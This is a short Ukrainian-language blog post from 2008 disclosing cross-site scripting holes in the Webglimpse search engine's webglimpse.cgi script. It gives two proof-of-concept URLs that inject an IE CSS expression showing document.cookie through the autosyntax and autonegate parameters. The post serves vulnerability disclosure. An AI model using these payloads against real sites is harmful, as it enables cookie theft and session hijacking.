Уразливості в Webglimpse
23:57 17.11.2008Сьогодні я знайшов Cross-Site Scripting уразливості в Webglimpse. Це локальна пошукова система. Дірки виявив на офіційному сайті системи http://webglimpse.net. Про що найближчим часом сповіщу розробників системи.
XSS (IE):
Уразливості в webglimpse.cgi в параметрах autosyntax і autonegate.
http://site/webglimpse.cgi?ID=1&query=12345&autosyntax=%22style%3D%22xss:expression(alert(document.cookie))
http://site/webglimpse.cgi?ID=1&query=12345&autonegate=%22style%3D%22xss:expression(alert(document.cookie))
Уразливі Webglimpse 2.18.7 та попередні версії.